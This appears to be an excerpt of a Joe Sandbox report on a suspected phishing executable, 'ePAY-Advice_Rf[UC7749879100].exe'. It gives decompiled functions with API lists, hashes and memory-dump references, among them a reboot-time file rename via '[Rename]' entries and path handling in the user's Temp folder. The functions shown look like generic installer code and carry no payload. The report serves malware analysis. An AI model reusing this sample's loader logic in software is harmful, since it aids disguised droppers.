Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: ?A@$Call$N
API String ID: 3103080414-3705382932
Opcode ID: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction ID: 58642e7cad261c001b024910741a92c2a1970d4d91afa6865c69404cbc82dd24
Opcode Fuzzy Hash: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction Fuzzy Hash: F061B2B1A40209BFEB109F61DD45B6A7B69FB84715F008036FB04BA2D1C7B8A951CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423714;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x422f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423708;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405BD9 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BD9(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x421a98 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x421e98, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x421698, "%s=%s\r\n", 0x421a98, 0x421e98);
						_t53 = _t52 + 0x10;
						E00405F8C(_t37, 0x400, 0x421e98, 0x421e98,  *((intOrPtr*)( *0x423714 + 0x128)));
						_t12 = E00405B03(0x421e98, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405B7B(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A68(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A68(_t38, _t21 + 0xa, 0x4093b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405ABE(_t24 + _t46, 0x421698, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BAA(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405B03(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x421a98, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405bd9
0x00405be2
0x00405be9
0x00405bfd
0x00405c25
0x00405c30
0x00405c34
0x00405c54
0x00405c5b
0x00405c65
0x00405c72
0x00405c77
0x00405c7c
0x00405c80
0x00405c8f
0x00405c91
0x00405c9e
0x00405ca2
0x00405d3d
0x00000000
0x00405cb8
0x00405cc5
0x00405ce9
0x00405ced
0x00405d0c
0x00405d10
0x00405d10
0x00405d12
0x00405d1b
0x00405d26
0x00405d31
0x00405d37
0x00000000
0x00405d37
0x00405cef
0x00405cf2
0x00405cfd
0x00405cf9
0x00405cfb
0x00405cfc
0x00405cfc
0x00405d04
0x00405d06
0x00000000
0x00405d06
0x00405cd0
0x00405cd6
0x00000000
0x00405cd6
0x00405ca2
0x00405c80
0x00405bff
0x00405c0a
0x00405c13
0x00405c17
0x00000000
0x00000000
0x00405c17
0x00405d48

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D6A,?,?), ref: 00405C0A
GetShortPathNameA.KERNEL32 ref: 00405C13

Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

GetShortPathNameA.KERNEL32 ref: 00405C30
wsprintfA.USER32 ref: 00405C4E
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C89
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C98
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CD0
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D26
GlobalFree.KERNEL32 ref: 00405D37
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D3E

Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

Strings

[Rename], xrefs: 00405CB8, 00405CCA
%s=%s, xrefs: 00405C44

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
Instruction ID: 5deb0727307c374d823852481fd1d72290d2d80dc16b0ec149a77f792b4fa3ea
Opcode Fuzzy Hash: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
Instruction Fuzzy Hash: 0F31F231605B156BD6206B659C49F6B3AACDF45754F14043BBE01FA2D2E67CAC008EBD

Uniqueness

Uniqueness Score: -1.00%

Function 6E16249C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E16249C(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E6E161215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M6E1625EA))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x6e16307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6e16309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6E161429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x6e16405c);
								goto L17;
							case 4:
								__ecx =  *0x6e16405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x6e16405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x6e16405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6e164000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E6E1612D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E6E161266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x6e1624a8
0x6e1624aa
0x6e1624b4
0x6e1624ba
0x6e1624c4
0x6e1624c8
0x6e1624cd
0x6e1624cd
0x6e1624d5
0x6e1624dc
0x6e1624e2
0x00000000
0x6e1624e9
0x00000000
0x00000000
0x6e1624f0
0x6e1624f4
0x6e1624f7
0x6e1624fb
0x6e162502
0x6e162506
0x6e16250c
0x6e16250e
0x6e162510
0x6e162510
0x6e162517
0x00000000
0x00000000
0x6e162520
0x00000000
0x00000000
0x6e162530
0x00000000
0x00000000
0x6e16255c
0x6e162564
0x6e16256e
0x6e162570
0x6e162575
0x00000000
0x00000000
0x6e162538
0x6e16253c
0x6e16253e
0x6e16253f
0x6e162541
0x6e162551
0x6e162558
0x00000000
0x00000000
0x6e16257b
0x6e16257d
0x6e162583
0x6e162589
0x6e162589
0x00000000
0x00000000
0x6e1624e2
0x6e16258c
0x6e16258c
0x6e162591
0x6e1625a2
0x6e1625a2
0x6e1625a8
0x6e1625ad
0x6e1625b2
0x6e1625be
0x6e1625c3
0x00000000
0x6e1625c8
0x6e1625b4
0x6e1625b5
0x6e1625c9
0x6e1625c9
0x6e1625b2
0x6e1625ca
0x6e1625ce
0x6e1625d1
0x6e1625e9

APIs

Part of subcall function 6E161215: GlobalAlloc.KERNELBASE(00000040,6E161233,?,6E1612CF,-6E16404B,6E1611AB,-000000A0), ref: 6E16121D

GlobalFree.KERNEL32 ref: 6E1625A2
GlobalFree.KERNEL32 ref: 6E1625DC

Strings

{v@uv, xrefs: 6E162541

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$Free$Alloc
String ID: {v@uv
API String ID: 1780285237-3152101019
Opcode ID: 67e9865191d32541fab4c7c3931ba9a7e4ef59ec23c6f55ae787501ada5a0782
Instruction ID: 894cb045148da2f12309032bcbb687ed899565b3b3c2275adf142d9c69197179
Opcode Fuzzy Hash: 67e9865191d32541fab4c7c3931ba9a7e4ef59ec23c6f55ae787501ada5a0782
Instruction Fuzzy Hash: 4841D6B1508601EFCB15CF94CCA8CBF7BB9EB86309B11892DF54083140D7759CA9EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1622B5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1622B5(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E6E1612AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E6E16123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M6E162442))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E6E1612FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E6E1612FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E6E161224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x6e16405c =  *0x6e16405c +  *0x6e16405c;
									__edi = GlobalAlloc(0x40,  *0x6e16405c +  *0x6e16405c);
									 *0x6e16405c = MultiByteToWideChar(0, 0, __ebx,  *0x6e16405c, __edi,  *0x6e16405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E6E1612FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x6e16405c;
									__esi = __esi +  *0x6e164064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E6E161429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E6E161224(0x6e164034);
					goto L10;
				}
			}

0x6e1622ca
0x6e1622ce
0x6e1622d9
0x6e1622d9
0x6e1622e0
0x6e1622e5
0x00000000
0x00000000
0x6e1622e9
0x6e1622ec
0x00000000
0x00000000
0x6e1622f1
0x6e1622fc
0x6e16230c
0x6e162303
0x6e162305
0x6e16231b
0x6e16231b
0x00000000
0x6e1622f3
0x6e1622f3
0x6e16231c
0x6e162320
0x6e162322
0x6e162322
0x6e162325
0x6e162325
0x6e16232d
0x6e162330
0x6e162337
0x6e16233b
0x6e16240a
0x6e16240b
0x6e162416
0x6e162441
0x6e162441
0x6e162426
0x6e162432
0x6e162428
0x6e162428
0x6e162428
0x00000000
0x6e162341
0x6e162341
0x00000000
0x6e162348
0x00000000
0x00000000
0x6e162351
0x00000000
0x00000000
0x6e16235f
0x6e162362
0x00000000
0x00000000
0x6e16236b
0x6e162370
0x6e162373
0x6e162374
0x00000000
0x00000000
0x6e162381
0x6e16238c
0x6e16239b
0x6e1623a6
0x6e1623c9
0x6e1623cc
0x6e1623a8
0x6e1623ac
0x6e1623b2
0x6e1623b3
0x6e1623b6
0x6e1623b7
0x6e1623ba
0x6e1623c1
0x6e1623c1
0x00000000
0x00000000
0x6e1623d4
0x6e1623d7
0x6e1623e3
0x6e1623e5
0x00000000
0x00000000
0x6e1623e8
0x6e1623eb
0x6e1623ec
0x6e1623f3
0x6e1623fa
0x6e1623fd
0x6e1623ff
0x6e162402
0x00000000
0x00000000
0x6e162341
0x6e16233b
0x6e162311
0x6e162316
0x00000000
0x6e162316

APIs

GlobalFree.KERNEL32 ref: 6E16240B

Part of subcall function 6E161224: lstrcpynA.KERNEL32(00000000,?,6E1612CF,-6E16404B,6E1611AB,-000000A0), ref: 6E161234

GlobalAlloc.KERNEL32(00000040,?), ref: 6E162386
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E16239B
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E1623AC
CLSIDFromString.OLE32(00000000,00000000), ref: 6E1623BA
GlobalFree.KERNEL32 ref: 6E1623C1

Strings

@uv, xrefs: 6E1623BA

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID: @uv
API String ID: 3730416702-666577103
Opcode ID: 2417a510ead2c77c84277b699dc1f8e3e14520dfe0d675f7d1b4c5a35eb3badc
Instruction ID: 9aa7c3ba8ecc44ef5eed499f00a7523295e35e753ee78b5c48b478d625524518
Opcode Fuzzy Hash: 2417a510ead2c77c84277b699dc1f8e3e14520dfe0d675f7d1b4c5a35eb3badc
Instruction Fuzzy Hash: 5841AF71508701EFDB50CFA99844BAAB7F8FF55311F21881EF946C7180D73498AAEB62

Uniqueness

Uniqueness Score: -1.00%

Function 004061D4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061D4(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040596F(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040592D("*?|<>/\":", _t5))) == 0) {
							E00405ABE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004061d6
0x004061de
0x004061f2
0x004061f2
0x004061f8
0x00406205
0x00406205
0x00406206
0x00406208
0x0040620c
0x0040620e
0x00406217
0x00406219
0x00406233
0x0040623b
0x0040623b
0x00406240
0x00406242
0x00406244
0x00406248
0x00406249
0x0040624c
0x00406254
0x00406256
0x0040625a
0x00000000
0x00000000
0x00406260
0x00406265
0x00000000
0x00000000
0x00000000
0x00406265
0x0040626a

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
CharNextA.USER32(?,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
CharPrevA.USER32(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 00406210
*?|<>/":, xrefs: 0040621C
C:\Users\user\AppData\Local\Temp\, xrefs: 004061D5

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2130716416
Opcode ID: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction ID: 78b5553556e1b29770c7274e4e8764cd0b55728b37568efcb800383df96c7a9c
